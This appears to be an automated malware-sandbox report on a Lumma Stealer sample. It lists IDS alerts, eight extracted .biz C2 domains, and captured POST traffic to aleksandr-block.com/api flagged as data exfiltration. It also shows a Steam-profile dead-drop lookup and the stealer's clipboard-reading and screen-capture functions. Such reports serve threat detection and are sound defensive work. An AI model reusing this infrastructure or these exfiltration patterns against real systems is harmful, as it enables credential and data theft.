        Source: Network trafficSuricata IDS: 2059145 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (punishzement .biz) : 192.168.2.10:57389 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2059135 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grandiouseziu .biz) : 192.168.2.10:57637 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2059133 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fraggielek .biz) : 192.168.2.10:64828 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2059137 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (littlenotii .biz) : 192.168.2.10:54196 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2059153 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (truculengisau .biz) : 192.168.2.10:64010 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2059143 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nuttyshopr .biz) : 192.168.2.10:54253 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49717 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49717 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.10:49704 -> 104.102.49.254:443
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49711 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49711 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49751 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49782 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.10:49761 -> 188.114.97.3:443
        Source: Malware configuration extractorURLs: nuttyshopr.biz
        Source: Malware configuration extractorURLs: truculengisau.biz
        Source: Malware configuration extractorURLs: punishzement.biz
        Source: Malware configuration extractorURLs: marketlumpe.biz
        Source: Malware configuration extractorURLs: spookycappy.biz
        Source: Malware configuration extractorURLs: fraggielek.biz
        Source: Malware configuration extractorURLs: grandiouseziu.biz
        Source: Malware configuration extractorURLs: littlenotii.biz
        Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
        Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
        Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49704 -> 104.102.49.254:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49711 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49751 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49737 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49717 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49745 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49782 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49761 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49728 -> 188.114.97.3:443
        Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aleksandr-block.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: aleksandr-block.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NKJ1O0YHINCT89User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12823Host: aleksandr-block.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9ILC58YHXFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15026Host: aleksandr-block.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LXMO8YRWF56EDZ7QNEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20436Host: aleksandr-block.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=M4F5EDKMPZFTENUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1212Host: aleksandr-block.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IR3AP3E77User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 590322Host: aleksandr-block.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: aleksandr-block.com
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
        Source: global trafficDNS traffic detected: DNS query: littlenotii.biz
        Source: global trafficDNS traffic detected: DNS query: fraggielek.biz
        Source: global trafficDNS traffic detected: DNS query: grandiouseziu.biz
        Source: global trafficDNS traffic detected: DNS query: marketlumpe.biz
        Source: global trafficDNS traffic detected: DNS query: nuttyshopr.biz
        Source: global trafficDNS traffic detected: DNS query: punishzement.biz
        Source: global trafficDNS traffic detected: DNS query: spookycappy.biz
        Source: global trafficDNS traffic detected: DNS query: truculengisau.biz
        Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
        Source: global trafficDNS traffic detected: DNS query: aleksandr-block.com
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aleksandr-block.com
        Source: powershell.exe, 00000001.00000002.1302987160.000001E0A0D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1322020182.000001E0AF2D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000001.00000002.1302987160.000001E09F368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1302987160.000001E0A09DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000001.00000002.1302987160.000001E09F141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000001.00000002.1302987160.000001E0A09DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000001.00000002.1302987160.000001E09F368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1302987160.000001E0A09DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000001.00000002.1302987160.000001E09F141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: RegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/
        Source: RegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/#p
        Source: RegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/&v
        Source: RegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/&vi
        Source: RegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/api
        Source: RegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/apiAPPDATA=C:
        Source: RegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/apiY
        Source: RegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/apia
        Source: RegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/pii
        Source: RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com:443/api
        Source: RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com:443/api0
        Source: powershell.exe, 00000001.00000002.1322020182.000001E0AF2D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000001.00000002.1322020182.000001E0AF2D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000001.00000002.1322020182.000001E0AF2D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000001.00000002.1302987160.000001E09F368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1302987160.000001E0A09DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000001.00000002.1302987160.000001E0A0423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grandiouseziu.biz:443/api
        Source: powershell.exe, 00000001.00000002.1302987160.000001E0A0D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1322020182.000001E0AF2D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000001.00000002.1302987160.000001E0A09DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
        Source: powershell.exe, 00000001.00000002.1302987160.000001E0A09DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
        Source: RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://punishzement.biz:443/apim8
        Source: RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49717 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49745 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49751 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49761 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49782 version: TLS 1.2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00436170 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,10_2_00436170
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00436170 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,10_2_00436170
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004368B6 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,10_2_004368B6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF7C0FD514A1_2_00007FF7C0FD514A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF7C0FD51981_2_00007FF7C0FD5198
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF7C0FDA6191_2_00007FF7C0FDA619
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF7C0FDA5D91_2_00007FF7C0FDA5D9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF7C10A0FA41_2_00007FF7C10A0FA4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF7C10A16481_2_00007FF7C10A1648
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040886010_2_00408860
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0044290010_2_00442900
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040BB5010_2_0040BB50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00427B3010_2_00427B30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0041040910_2_00410409
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0043B50010_2_0043B500
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042E5CA10_2_0042E5CA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00420DF010_2_00420DF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00424D9410_2_00424D94
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00414E1810_2_00414E18
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040AEC010_2_0040AEC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004097E010_2_004097E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00441FA010_2_00441FA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042587010_2_00425870
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0041900010_2_00419000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040682010_2_00406820
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042003A10_2_0042003A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042889D10_2_0042889D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0043C0A010_2_0043C0A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042F0BD10_2_0042F0BD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040396010_2_00403960
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0041C96010_2_0041C960
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042916110_2_00429161
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042996810_2_00429968
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0043997F10_2_0043997F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042F12D10_2_0042F12D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042F1D910_2_0042F1D9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040A9F010_2_0040A9F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004119B010_2_004119B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040EA6010_2_0040EA60
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042EA6110_2_0042EA61
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0043526810_2_00435268
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00415A2F10_2_00415A2F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00416A3910_2_00416A39
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004172C810_2_004172C8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0041EAD010_2_0041EAD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042CAD010_2_0042CAD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004412D010_2_004412D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042D2E010_2_0042D2E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00428AF710_2_00428AF7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00421A8010_2_00421A80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00440A8110_2_00440A81
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00417AB210_2_00417AB2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00418ABC10_2_00418ABC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0043EB4010_2_0043EB40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040CB5010_2_0040CB50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00402B7010_2_00402B70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042E37010_2_0042E370
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0043AB7010_2_0043AB70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00432B7F10_2_00432B7F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040431010_2_00404310
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0043332010_2_00433320
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0044232010_2_00442320
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00405B3010_2_00405B30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00419B3010_2_00419B30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004413C010_2_004413C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004273D010_2_004273D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004413D710_2_004413D7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004413D910_2_004413D9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004393F610_2_004393F6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040639010_2_00406390
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040B62010_2_0040B620
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042547010_2_00425470
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042FC1010_2_0042FC10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0041D4C010_2_0041D4C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004414C010_2_004414C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00415A2F10_2_00415A2F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00413C9010_2_00413C90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00435C9010_2_00435C90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00408CA010_2_00408CA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00441CB010_2_00441CB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00429CB710_2_00429CB7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042155010_2_00421550
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0044156010_2_00441560
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00415D6610_2_00415D66
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0041B57010_2_0041B570
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042053410_2_00420534
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0043ADD010_2_0043ADD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0043C5E010_2_0043C5E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0041ADE210_2_0041ADE2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042ADEB10_2_0042ADEB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004075F010_2_004075F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004415F010_2_004415F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00427E5010_2_00427E50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00429E6110_2_00429E61
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00434E0E10_2_00434E0E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0044261010_2_00442610
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040B62010_2_0040B620
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0041C62010_2_0041C620
